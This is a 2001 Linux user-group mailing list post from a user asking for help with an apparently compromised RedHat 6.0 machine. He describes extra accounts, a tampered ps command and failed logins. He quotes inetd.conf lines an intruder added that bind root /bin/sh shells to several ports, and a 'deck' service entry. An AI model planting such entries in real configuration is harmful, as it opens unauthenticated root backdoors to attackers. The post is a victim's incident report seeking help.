VanLUG Email Archive

Traduisez - Übersetzen - Traduzca - Traduza - Tradurre - Translate

VanLUG Mailing List
Help continue

Derek Tam (dtam@langara.bc.ca)
Mon, 19 Mar 2001 09:53:49 -0800

• Next message: Alan Hodgson: "Re: Help continue"
• Previous message: Derek Tam: "Re: Help continue"
• Next in thread: Derek Tam: "Re: Help continue"
• Maybe reply: Derek Tam: "Re: Help continue"
• Reply: Alan Hodgson: "Re: Help continue"

Hi There,

I found that two files, 'inetd.conf' and 'services' files, have been
changed in /etc. The 'inetd.conf' became :

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
6635 stream tcp nowait root /bin/sh sh -i
1008 stream tcp nowait root /bin/sh sh
deck stream tcp nowait root /bin/sh sh -i

and in the 'services' file, there is a line at the end of the file

deck 23023/tcp

I didn't change the 'inet.conf' (just comment out some of the services from
the original file) and didn't add the 'deck' service to the 'services'
file. Also, I don't know what the above two lines '(6635 and 1008) are
doing.

Can anyone tell me what 'deck', '6635' and '1008' are? Is that the hole on
my computer?

Thanks,

Derek

On 16 Mar 2001, at 10:38, Derek Tam wrote:

>Hi There,
>
>I have a RedHat Linux 6.0 (2.2.16-3) box at home, and I use 'IPCHAINS' to
setup the firewall. >Recently, I find that I can't use 'ps -fe' command on
my machine (not really doesn't work, but only >display my shell process and
the getty processes). But I still can use 'ps -aux'.
>
>Until yesterday, I found that I couldn't logon to my computer in text
mode. I tried to login using other >users including root, it just returned
'incorrect login'. I rebooted the machine, but still didn't help. >When I
switched to GUI mode, I could login to my machine. I found that there two
users more in the >passwd and shadow files. I deleted the two users (one
is 'b' and the other one is 'bb') from these files >and rebooted, but still
didn't help ( I still couldn't login in text mode). This morning, I tried
to login (in >GUI mode), it just gave me a 'blue' screen, I knew that I can
login, but couldn't startup enlightenment.
>
>Is my computer was hack? Can anybody help me to fix it? Once fixed, how I
can protect my >computer. I haven't install ssh (sometimes I telnet from
remote site) on my machine, should I install it? >Does RedHat has a ssh
RPM?
>
>Many thanks,
>
>
>Derek
>
>

--
This message came to you via the Vancouver Linux Users Group mailing list.
For unsubscription instructions do not email the list, but rather send mail
to <vanlug-request@gweep.bc.ca>.

• Next message: Alan Hodgson: "Re: Help continue"
• Previous message: Derek Tam: "Re: Help continue"
• Next in thread: Derek Tam: "Re: Help continue"
• Maybe reply: Derek Tam: "Re: Help continue"
• Reply: Alan Hodgson: "Re: Help continue"